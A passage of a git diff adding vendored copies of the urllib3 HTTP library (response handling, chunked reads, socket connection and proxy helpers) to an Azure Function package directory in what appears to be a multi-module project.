+    ):
+
+        if isinstance(headers, HTTPHeaderDict):
+            self.headers = headers
+        else:
+            self.headers = HTTPHeaderDict(headers)
+        self.status = status
+        self.version = version
+        self.reason = reason
+        self.strict = strict
+        self.decode_content = decode_content
+        self.retries = retries
+        self.enforce_content_length = enforce_content_length
+        self.auto_close = auto_close
+
+        self._decoder = None
+        self._body = None
+        self._fp = None
+        self._original_response = original_response
+        self._fp_bytes_read = 0
+        self.msg = msg
+        self._request_url = request_url
+
+        if body and isinstance(body, (six.string_types, bytes)):
+            self._body = body
+
+        self._pool = pool
+        self._connection = connection
+
+        if hasattr(body, "read"):
+            self._fp = body
+
+        # Are we using the chunked-style of transfer encoding?
+        self.chunked = False
+        self.chunk_left = None
+        tr_enc = self.headers.get("transfer-encoding", "").lower()
+        # Don't incur the penalty of creating a list and then discarding it
+        encodings = (enc.strip() for enc in tr_enc.split(","))
+        if "chunked" in encodings:
+            self.chunked = True
+
+        # Determine length of response
+        self.length_remaining = self._init_length(request_method)
+
+        # If requested, preload the body.
+        if preload_content and not self._body:
+            self._body = self.read(decode_content=decode_content)
+
+    def get_redirect_location(self):
+        """
+        Should we redirect and where to?
+
+        :returns: Truthy redirect location string if we got a redirect status
+            code and valid location. ``None`` if redirect status and no
+            location. ``False`` if not a redirect status code.
+        """
+        if self.status in self.REDIRECT_STATUSES:
+            return self.headers.get("location")
+
+        return False
+
+    def release_conn(self):
+        if not self._pool or not self._connection:
+            return
+
+        self._pool._put_conn(self._connection)
+        self._connection = None
+
+    def drain_conn(self):
+        """
+        Read and discard any remaining HTTP response data in the response connection.
+
+        Unread data in the HTTPResponse connection blocks the connection from being released back to the pool.
+        """
+        try:
+            self.read()
+        except (HTTPError, SocketError, BaseSSLError, HTTPException):
+            pass
+
+    @property
+    def data(self):
+        # For backwards-compat with urllib3 0.4 and earlier.
+        if self._body:
+            return self._body
+
+        if self._fp:
+            return self.read(cache_content=True)
+
+    @property
+    def connection(self):
+        return self._connection
+
+    def isclosed(self):
+        return is_fp_closed(self._fp)
+
+    def tell(self):
+        """
+        Obtain the number of bytes pulled over the wire so far. May differ from
+        the amount of content returned by :meth:`urllib3.response.HTTPResponse.read`
+        if bytes are encoded on the wire (e.g., compressed).
+        """
+        return self._fp_bytes_read
+
+    def _init_length(self, request_method):
+        """
+        Set initial length value for Response content if available.
+        """
+        length = self.headers.get("content-length")
+
+        if length is not None:
+            if self.chunked:
+                # This Response will fail with an IncompleteRead if it can't be
+                # received as chunked.
This method falls back to attempt reading + # the response before raising an exception. + log.warning( + "Received response with both Content-Length and " + "Transfer-Encoding set. This is expressly forbidden " + "by RFC 7230 sec 3.3.2. Ignoring Content-Length and " + "attempting to process response as Transfer-Encoding: " + "chunked." + ) + return None + + try: + # RFC 7230 section 3.3.2 specifies multiple content lengths can + # be sent in a single Content-Length header + # (e.g. Content-Length: 42, 42). This line ensures the values + # are all valid ints and that as long as the `set` length is 1, + # all values are the same. Otherwise, the header is invalid. + lengths = set([int(val) for val in length.split(",")]) + if len(lengths) > 1: + raise InvalidHeader( + "Content-Length contained multiple " + "unmatching values (%s)" % length + ) + length = lengths.pop() + except ValueError: + length = None + else: + if length < 0: + length = None + + # Convert status to int for comparison + # In some cases, httplib returns a status of "_UNKNOWN" + try: + status = int(self.status) + except ValueError: + status = 0 + + # Check for responses that shouldn't include a body + if status in (204, 304) or 100 <= status < 200 or request_method == "HEAD": + length = 0 + + return length + + def _init_decoder(self): + """ + Set-up the _decoder attribute if necessary. + """ + # Note: content-encoding value should be case-insensitive, per RFC 7230 + # Section 3.2 + content_encoding = self.headers.get("content-encoding", "").lower() + if self._decoder is None: + if content_encoding in self.CONTENT_DECODERS: + self._decoder = _get_decoder(content_encoding) + elif "," in content_encoding: + encodings = [ + e.strip() + for e in content_encoding.split(",") + if e.strip() in self.CONTENT_DECODERS + ] + if len(encodings): + self._decoder = _get_decoder(content_encoding) + + DECODER_ERROR_CLASSES = (IOError, zlib.error) + if brotli is not None: + DECODER_ERROR_CLASSES += (brotli.error,) + + def _decode(self, data, decode_content, flush_decoder): + """ + Decode the data passed in and potentially flush the decoder. + """ + if not decode_content: + return data + + try: + if self._decoder: + data = self._decoder.decompress(data) + except self.DECODER_ERROR_CLASSES as e: + content_encoding = self.headers.get("content-encoding", "").lower() + raise DecodeError( + "Received response with content-encoding: %s, but " + "failed to decode it." % content_encoding, + e, + ) + if flush_decoder: + data += self._flush_decoder() + + return data + + def _flush_decoder(self): + """ + Flushes the decoder. Should only be called if the decoder is actually + being used. + """ + if self._decoder: + buf = self._decoder.decompress(b"") + return buf + self._decoder.flush() + + return b"" + + @contextmanager + def _error_catcher(self): + """ + Catch low-level python exceptions, instead re-raising urllib3 + variants, so that low-level exceptions are not leaked in the + high-level api. + + On exit, release the connection back to the pool. + """ + clean_exit = False + + try: + try: + yield + + except SocketTimeout: + # FIXME: Ideally we'd like to include the url in the ReadTimeoutError but + # there is yet no clean way to get at it from this context. + raise ReadTimeoutError(self._pool, None, "Read timed out.") + + except BaseSSLError as e: + # FIXME: Is there a better way to differentiate between SSLErrors? 
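+                # NOTE (illustrative; not part of upstream urllib3):
+                # ssl.SSLError exposes no stable code for read timeouts, so the
+                # message text is matched below; a timeout becomes a
+                # ReadTimeoutError, while any other SSLError (e.g. a bad record
+                # MAC) is re-raised as urllib3's SSLError.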
+                if "read operation timed out" not in str(e):
+                    # SSL errors related to framing/MAC get wrapped and reraised here
+                    raise SSLError(e)
+
+                raise ReadTimeoutError(self._pool, None, "Read timed out.")
+
+            except (HTTPException, SocketError) as e:
+                # This includes IncompleteRead.
+                raise ProtocolError("Connection broken: %r" % e, e)
+
+            # If no exception is thrown, we should avoid cleaning up
+            # unnecessarily.
+            clean_exit = True
+        finally:
+            # If we didn't terminate cleanly, we need to throw away our
+            # connection.
+            if not clean_exit:
+                # The response may not be closed but we're not going to use it
+                # anymore so close it now to ensure that the connection is
+                # released back to the pool.
+                if self._original_response:
+                    self._original_response.close()
+
+                # Closing the response may not actually be sufficient to close
+                # everything, so if we have a hold of the connection close that
+                # too.
+                if self._connection:
+                    self._connection.close()
+
+            # If we hold the original response but it's closed now, we should
+            # return the connection back to the pool.
+            if self._original_response and self._original_response.isclosed():
+                self.release_conn()
+
+    def read(self, amt=None, decode_content=None, cache_content=False):
+        """
+        Similar to :meth:`http.client.HTTPResponse.read`, but with two additional
+        parameters: ``decode_content`` and ``cache_content``.
+
+        :param amt:
+            How much of the content to read. If specified, caching is skipped
+            because it doesn't make sense to cache partial content as the full
+            response.
+
+        :param decode_content:
+            If True, will attempt to decode the body based on the
+            'content-encoding' header.
+
+        :param cache_content:
+            If True, will save the returned data such that the same result is
+            returned regardless of the state of the underlying file object. This
+            is useful if you want the ``.data`` property to continue working
+            after having ``.read()`` the file object. (Overridden if ``amt`` is
+            set.)
+        """
+        self._init_decoder()
+        if decode_content is None:
+            decode_content = self.decode_content
+
+        if self._fp is None:
+            return
+
+        flush_decoder = False
+        fp_closed = getattr(self._fp, "closed", False)
+
+        with self._error_catcher():
+            if amt is None:
+                # cStringIO doesn't like amt=None
+                data = self._fp.read() if not fp_closed else b""
+                flush_decoder = True
+            else:
+                cache_content = False
+                data = self._fp.read(amt) if not fp_closed else b""
+                if (
+                    amt != 0 and not data
+                ):  # Platform-specific: Buggy versions of Python.
+                    # Close the connection when no data is returned
+                    #
+                    # This is redundant to what httplib/http.client _should_
+                    # already do. However, versions of python released before
+                    # December 15, 2012 (http://bugs.python.org/issue16298) do
+                    # not properly close the connection in all cases. There is
+                    # no harm in redundantly calling close.
+                    self._fp.close()
+                    flush_decoder = True
+                    if self.enforce_content_length and self.length_remaining not in (
+                        0,
+                        None,
+                    ):
+                        # This is an edge case that httplib failed to cover due
+                        # to concerns of backward compatibility. We're
+                        # addressing it here to make sure IncompleteRead is
+                        # raised during streaming, so all calls with incorrect
+                        # Content-Length are caught.
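# A small sketch of the edge case handled just below, assuming urllib3 is
# importable: the header promises more bytes than the stream delivers, so
# a chunk-wise read raises IncompleteRead instead of returning a silently
# truncated body.
import io
from urllib3.response import HTTPResponse

r = HTTPResponse(
    body=io.BytesIO(b"abc"),           # only 3 bytes actually arrive...
    headers={"Content-Length": "10"},  # ...but 10 were promised
    status=200,
    preload_content=False,
    enforce_content_length=True,
)
r.read(1024)  # -> b"abc"
r.read(1024)  # raises IncompleteRead(3 bytes read, 7 more expected)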
+                        raise IncompleteRead(self._fp_bytes_read, self.length_remaining)
+
+        if data:
+            self._fp_bytes_read += len(data)
+            if self.length_remaining is not None:
+                self.length_remaining -= len(data)
+
+            data = self._decode(data, decode_content, flush_decoder)
+
+            if cache_content:
+                self._body = data
+
+        return data
+
+    def stream(self, amt=2 ** 16, decode_content=None):
+        """
+        A generator wrapper for the read() method. A call will block until
+        ``amt`` bytes have been read from the connection or until the
+        connection is closed.
+
+        :param amt:
+            How much of the content to read. The generator will return up to
+            ``amt`` bytes of data per iteration, but may return less. This is
+            particularly likely when using compressed data. However, the empty
+            string will never be returned.
+
+        :param decode_content:
+            If True, will attempt to decode the body based on the
+            'content-encoding' header.
+        """
+        if self.chunked and self.supports_chunked_reads():
+            for line in self.read_chunked(amt, decode_content=decode_content):
+                yield line
+        else:
+            while not is_fp_closed(self._fp):
+                data = self.read(amt=amt, decode_content=decode_content)
+
+                if data:
+                    yield data
+
+    @classmethod
+    def from_httplib(ResponseCls, r, **response_kw):
+        """
+        Given an :class:`http.client.HTTPResponse` instance ``r``, return a
+        corresponding :class:`urllib3.response.HTTPResponse` object.
+
+        Remaining parameters are passed to the HTTPResponse constructor, along
+        with ``original_response=r``.
+        """
+        headers = r.msg
+
+        if not isinstance(headers, HTTPHeaderDict):
+            if six.PY2:
+                # Python 2.7
+                headers = HTTPHeaderDict.from_httplib(headers)
+            else:
+                headers = HTTPHeaderDict(headers.items())
+
+        # HTTPResponse objects in Python 3 don't have a .strict attribute
+        strict = getattr(r, "strict", 0)
+        resp = ResponseCls(
+            body=r,
+            headers=headers,
+            status=r.status,
+            version=r.version,
+            reason=r.reason,
+            strict=strict,
+            original_response=r,
+            **response_kw
+        )
+        return resp
+
+    # Backwards-compatibility methods for http.client.HTTPResponse
+    def getheaders(self):
+        return self.headers
+
+    def getheader(self, name, default=None):
+        return self.headers.get(name, default)
+
+    # Backwards compatibility for http.cookiejar
+    def info(self):
+        return self.headers
+
+    # Overrides from io.IOBase
+    def close(self):
+        if not self.closed:
+            self._fp.close()
+
+        if self._connection:
+            self._connection.close()
+
+        if not self.auto_close:
+            io.IOBase.close(self)
+
+    @property
+    def closed(self):
+        if not self.auto_close:
+            return io.IOBase.closed.__get__(self)
+        elif self._fp is None:
+            return True
+        elif hasattr(self._fp, "isclosed"):
+            return self._fp.isclosed()
+        elif hasattr(self._fp, "closed"):
+            return self._fp.closed
+        else:
+            return True
+
+    def fileno(self):
+        if self._fp is None:
+            raise IOError("HTTPResponse has no file to get a fileno from")
+        elif hasattr(self._fp, "fileno"):
+            return self._fp.fileno()
+        else:
+            raise IOError(
+                "The file-like object this HTTPResponse is wrapped "
+                "around has no file descriptor"
+            )
+
+    def flush(self):
+        if (
+            self._fp is not None
+            and hasattr(self._fp, "flush")
+            and not getattr(self._fp, "closed", False)
+        ):
+            return self._fp.flush()
+
+    def readable(self):
+        # This method is required for `io` module compatibility.
+        return True
+
+    def readinto(self, b):
+        # This method is required for `io` module compatibility.
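# Because HTTPResponse subclasses io.IOBase and implements readable() and
# readinto() here, it composes with the standard io machinery. A sketch,
# assuming `http` is a urllib3 PoolManager; the auto_close pattern follows
# the urllib3 documentation:
import io
r = http.request("GET", "https://example.com/", preload_content=False)
r.auto_close = False          # keep the fp usable across EOF for io wrappers
for line in io.TextIOWrapper(r):
    print(line)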
+        temp = self.read(len(b))
+        if len(temp) == 0:
+            return 0
+        else:
+            b[: len(temp)] = temp
+            return len(temp)
+
+    def supports_chunked_reads(self):
+        """
+        Checks if the underlying file-like object looks like a
+        :class:`http.client.HTTPResponse` object. We do this by testing for
+        the fp attribute. If it is present we assume it returns raw chunks as
+        processed by read_chunked().
+        """
+        return hasattr(self._fp, "fp")
+
+    def _update_chunk_length(self):
+        # First, we'll figure out length of a chunk and then
+        # we'll try to read it from socket.
+        if self.chunk_left is not None:
+            return
+        line = self._fp.fp.readline()
+        line = line.split(b";", 1)[0]
+        try:
+            self.chunk_left = int(line, 16)
+        except ValueError:
+            # Invalid chunked protocol response, abort.
+            self.close()
+            raise InvalidChunkLength(self, line)
+
+    def _handle_chunk(self, amt):
+        returned_chunk = None
+        if amt is None:
+            chunk = self._fp._safe_read(self.chunk_left)
+            returned_chunk = chunk
+            self._fp._safe_read(2)  # Toss the CRLF at the end of the chunk.
+            self.chunk_left = None
+        elif amt < self.chunk_left:
+            value = self._fp._safe_read(amt)
+            self.chunk_left = self.chunk_left - amt
+            returned_chunk = value
+        elif amt == self.chunk_left:
+            value = self._fp._safe_read(amt)
+            self._fp._safe_read(2)  # Toss the CRLF at the end of the chunk.
+            self.chunk_left = None
+            returned_chunk = value
+        else:  # amt > self.chunk_left
+            returned_chunk = self._fp._safe_read(self.chunk_left)
+            self._fp._safe_read(2)  # Toss the CRLF at the end of the chunk.
+            self.chunk_left = None
+        return returned_chunk
+
+    def read_chunked(self, amt=None, decode_content=None):
+        """
+        Similar to :meth:`HTTPResponse.read`, but with an additional
+        parameter: ``decode_content``.
+
+        :param amt:
+            How much of the content to read. If specified, caching is skipped
+            because it doesn't make sense to cache partial content as the full
+            response.
+
+        :param decode_content:
+            If True, will attempt to decode the body based on the
+            'content-encoding' header.
+        """
+        self._init_decoder()
+        # FIXME: Rewrite this method and make it a class with a better structured logic.
+        if not self.chunked:
+            raise ResponseNotChunked(
+                "Response is not chunked. "
+                "Header 'transfer-encoding: chunked' is missing."
+            )
+        if not self.supports_chunked_reads():
+            raise BodyNotHttplibCompatible(
+                "Body should be http.client.HTTPResponse like. "
+                "It should have an fp attribute which returns raw chunks."
+            )
+
+        with self._error_catcher():
+            # Don't bother reading the body of a HEAD request.
+            if self._original_response and is_response_to_head(self._original_response):
+                self._original_response.close()
+                return
+
+            # If a response is already read and closed
+            # then return immediately.
+            if self._fp.fp is None:
+                return
+
+            while True:
+                self._update_chunk_length()
+                if self.chunk_left == 0:
+                    break
+                chunk = self._handle_chunk(amt)
+                decoded = self._decode(
+                    chunk, decode_content=decode_content, flush_decoder=False
+                )
+                if decoded:
+                    yield decoded
+
+            if decode_content:
+                # On CPython and PyPy, we should never need to flush the
+                # decoder. However, on Jython we *might* need to, so
+                # lets defensively do it anyway.
+                decoded = self._flush_decoder()
+                if decoded:  # Platform-specific: Jython.
+                    yield decoded
+
+            # Chunk content ends with \r\n: discard it.
+            while True:
+                line = self._fp.fp.readline()
+                if not line:
+                    # Some sites may not end with '\r\n'.
+                    break
+                if line == b"\r\n":
+                    break
+
+            # We read everything; close the "file".
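# The chunk-size line consumed by _update_chunk_length above is a
# hexadecimal count, optionally followed by ";extension" parameters; a
# standalone sketch of the parse:
line = b"1a4;name=value\r\n"
chunk_size = int(line.split(b";", 1)[0], 16)  # -> 420 bytes in this chunk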
+ if self._original_response: + self._original_response.close() + + def geturl(self): + """ + Returns the URL that was the source of this response. + If the request that generated this response redirected, this method + will return the final redirect location. + """ + if self.retries is not None and len(self.retries.history): + return self.retries.history[-1].redirect_location + else: + return self._request_url + + def __iter__(self): + buffer = [] + for chunk in self.stream(decode_content=True): + if b"\n" in chunk: + chunk = chunk.split(b"\n") + yield b"".join(buffer) + chunk[0] + b"\n" + for x in chunk[1:-1]: + yield x + b"\n" + if chunk[-1]: + buffer = [chunk[-1]] + else: + buffer = [] + else: + buffer.append(chunk) + if buffer: + yield b"".join(buffer) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__init__.py new file mode 100644 index 0000000..5037745 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__init__.py @@ -0,0 +1,49 @@ +from __future__ import absolute_import + +# For backwards compatibility, provide imports that used to be here. +from .connection import is_connection_dropped +from .request import SKIP_HEADER, SKIPPABLE_HEADERS, make_headers +from .response import is_fp_closed +from .retry import Retry +from .ssl_ import ( + ALPN_PROTOCOLS, + HAS_SNI, + IS_PYOPENSSL, + IS_SECURETRANSPORT, + PROTOCOL_TLS, + SSLContext, + assert_fingerprint, + resolve_cert_reqs, + resolve_ssl_version, + ssl_wrap_socket, +) +from .timeout import Timeout, current_time +from .url import Url, get_host, parse_url, split_first +from .wait import wait_for_read, wait_for_write + +__all__ = ( + "HAS_SNI", + "IS_PYOPENSSL", + "IS_SECURETRANSPORT", + "SSLContext", + "PROTOCOL_TLS", + "ALPN_PROTOCOLS", + "Retry", + "Timeout", + "Url", + "assert_fingerprint", + "current_time", + "is_connection_dropped", + "is_fp_closed", + "get_host", + "parse_url", + "make_headers", + "resolve_cert_reqs", + "resolve_ssl_version", + "split_first", + "ssl_wrap_socket", + "wait_for_read", + "wait_for_write", + "SKIP_HEADER", + "SKIPPABLE_HEADERS", +) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..3711f01 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/connection.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/connection.cpython-39.pyc new file mode 100644 index 0000000..820ab10 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/connection.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/proxy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/proxy.cpython-39.pyc new file mode 
100644 index 0000000..219257e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/proxy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/queue.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/queue.cpython-39.pyc new file mode 100644 index 0000000..23cc189 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/queue.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/request.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/request.cpython-39.pyc new file mode 100644 index 0000000..f636daa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/request.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/response.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/response.cpython-39.pyc new file mode 100644 index 0000000..dd62c94 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/response.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/retry.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/retry.cpython-39.pyc new file mode 100644 index 0000000..031f67c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/retry.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssl_.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssl_.cpython-39.pyc new file mode 100644 index 0000000..c47330d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssl_.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssl_match_hostname.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssl_match_hostname.cpython-39.pyc new file mode 100644 index 0000000..917d51d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssl_match_hostname.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssltransport.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssltransport.cpython-39.pyc new file mode 100644 index 0000000..4e21e16 Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/ssltransport.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/timeout.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/timeout.cpython-39.pyc new file mode 100644 index 0000000..cacf90e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/timeout.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/url.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/url.cpython-39.pyc new file mode 100644 index 0000000..9cdfcb8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/url.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/wait.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/wait.cpython-39.pyc new file mode 100644 index 0000000..5142e97 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/__pycache__/wait.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/connection.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/connection.py new file mode 100644 index 0000000..64cd463 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/connection.py @@ -0,0 +1,149 @@ +from __future__ import absolute_import + +import socket + +from ..contrib import _appengine_environ +from ..exceptions import LocationParseError +from ..packages import six +from .wait import NoWayToWaitForSocketError, wait_for_read + + +def is_connection_dropped(conn): # Platform-specific + """ + Returns True if the connection is dropped and should be closed. + + :param conn: + :class:`http.client.HTTPConnection` object. + + Note: For platforms like AppEngine, this will always return ``False`` to + let the platform handle connection recycling transparently for us. + """ + sock = getattr(conn, "sock", False) + if sock is False: # Platform-specific: AppEngine + return False + if sock is None: # Connection already closed (such as by httplib). + return True + try: + # Returns True if readable, which here means it's been dropped + return wait_for_read(sock, timeout=0.0) + except NoWayToWaitForSocketError: # Platform-specific: AppEngine + return False + + +# This function is copied from socket.py in the Python 2.7 standard +# library test suite. Added to its signature is only `socket_options`. +# One additional modification is that we avoid binding to IPv6 servers +# discovered in DNS if the system doesn't have IPv6 functionality. +def create_connection( + address, + timeout=socket._GLOBAL_DEFAULT_TIMEOUT, + source_address=None, + socket_options=None, +): + """Connect to *address* and return the socket object. + + Convenience function. Connect to *address* (a 2-tuple ``(host, + port)``) and return the socket object. 
Passing the optional
+    *timeout* parameter will set the timeout on the socket instance
+    before attempting to connect. If no *timeout* is supplied, the
+    global default timeout setting returned by :func:`socket.getdefaulttimeout`
+    is used. If *source_address* is set it must be a tuple of (host, port)
+    for the socket to bind as a source address before making the connection.
+    A host of '' or port 0 tells the OS to use the default.
+    """
+
+    host, port = address
+    if host.startswith("["):
+        host = host.strip("[]")
+    err = None
+
+    # Using the value from allowed_gai_family() in the context of getaddrinfo lets
+    # us select whether to work with IPv4 DNS records, IPv6 records, or both.
+    # The original create_connection function always returns all records.
+    family = allowed_gai_family()
+
+    try:
+        host.encode("idna")
+    except UnicodeError:
+        return six.raise_from(
+            LocationParseError(u"'%s', label empty or too long" % host), None
+        )
+
+    for res in socket.getaddrinfo(host, port, family, socket.SOCK_STREAM):
+        af, socktype, proto, canonname, sa = res
+        sock = None
+        try:
+            sock = socket.socket(af, socktype, proto)
+
+            # If provided, set socket level options before connecting.
+            _set_socket_options(sock, socket_options)
+
+            if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
+                sock.settimeout(timeout)
+            if source_address:
+                sock.bind(source_address)
+            sock.connect(sa)
+            return sock
+
+        except socket.error as e:
+            err = e
+            if sock is not None:
+                sock.close()
+                sock = None
+
+    if err is not None:
+        raise err
+
+    raise socket.error("getaddrinfo returns an empty list")
+
+
+def _set_socket_options(sock, options):
+    if options is None:
+        return
+
+    for opt in options:
+        sock.setsockopt(*opt)
+
+
+def allowed_gai_family():
+    """This function is designed to work in the context of
+    getaddrinfo, where family=socket.AF_UNSPEC is the default and
+    will perform a DNS search for both IPv6 and IPv4 records."""
+
+    family = socket.AF_INET
+    if HAS_IPV6:
+        family = socket.AF_UNSPEC
+    return family
+
+
+def _has_ipv6(host):
+    """Returns True if the system can bind an IPv6 address."""
+    sock = None
+    has_ipv6 = False
+
+    # App Engine doesn't support IPV6 sockets and actually has a quota on the
+    # number of sockets that can be used, so just early out here instead of
+    # creating a socket needlessly.
+    # See https://github.com/urllib3/urllib3/issues/1446
+    if _appengine_environ.is_appengine_sandbox():
+        return False
+
+    if socket.has_ipv6:
+        # has_ipv6 returns true if cPython was compiled with IPv6 support.
+        # It does not tell us if the system has IPv6 support enabled. To
+        # determine that we must bind to an IPv6 address.
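# A usage sketch for create_connection() above, assuming a reachable host:
# socket_options is a list of setsockopt() argument tuples applied before
# connect(); the tuple shown mirrors urllib3's default of disabling Nagle's
# algorithm.
import socket
from urllib3.util.connection import create_connection

sock = create_connection(
    ("example.com", 80),
    timeout=5.0,
    socket_options=[(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)],
)
sock.close()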
+ # https://github.com/urllib3/urllib3/pull/611 + # https://bugs.python.org/issue658327 + try: + sock = socket.socket(socket.AF_INET6) + sock.bind((host, 0)) + has_ipv6 = True + except Exception: + pass + + if sock: + sock.close() + return has_ipv6 + + +HAS_IPV6 = _has_ipv6("::1") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/proxy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/proxy.py new file mode 100644 index 0000000..fbe47e7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/proxy.py @@ -0,0 +1,57 @@ +from .ssl_ import create_urllib3_context, resolve_cert_reqs, resolve_ssl_version + + +def connection_requires_http_tunnel( + proxy_url=None, proxy_config=None, destination_scheme=None +): + """ + Returns True if the connection requires an HTTP CONNECT through the proxy. + + :param URL proxy_url: + URL of the proxy. + :param ProxyConfig proxy_config: + Proxy configuration from poolmanager.py + :param str destination_scheme: + The scheme of the destination. (i.e https, http, etc) + """ + # If we're not using a proxy, no way to use a tunnel. + if proxy_url is None: + return False + + # HTTP destinations never require tunneling, we always forward. + if destination_scheme == "http": + return False + + # Support for forwarding with HTTPS proxies and HTTPS destinations. + if ( + proxy_url.scheme == "https" + and proxy_config + and proxy_config.use_forwarding_for_https + ): + return False + + # Otherwise always use a tunnel. + return True + + +def create_proxy_ssl_context( + ssl_version, cert_reqs, ca_certs=None, ca_cert_dir=None, ca_cert_data=None +): + """ + Generates a default proxy ssl context if one hasn't been provided by the + user. + """ + ssl_context = create_urllib3_context( + ssl_version=resolve_ssl_version(ssl_version), + cert_reqs=resolve_cert_reqs(cert_reqs), + ) + + if ( + not ca_certs + and not ca_cert_dir + and not ca_cert_data + and hasattr(ssl_context, "load_default_certs") + ): + ssl_context.load_default_certs() + + return ssl_context diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/queue.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/queue.py new file mode 100644 index 0000000..e617560 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/queue.py @@ -0,0 +1,22 @@ +import collections + +from ..packages import six +from ..packages.six.moves import queue + +if six.PY2: + # Queue is imported for side effects on MS Windows. See issue #229. 
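# A short sketch of connection_requires_http_tunnel() from proxy.py above:
# plain-HTTP destinations are forwarded through the proxy, while HTTPS
# destinations default to a CONNECT tunnel.
from urllib3.util.proxy import connection_requires_http_tunnel
from urllib3.util.url import parse_url

proxy = parse_url("http://proxy.internal:3128")
connection_requires_http_tunnel(proxy, None, "http")   # False: forwarded
connection_requires_http_tunnel(proxy, None, "https")  # True: CONNECT tunnel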
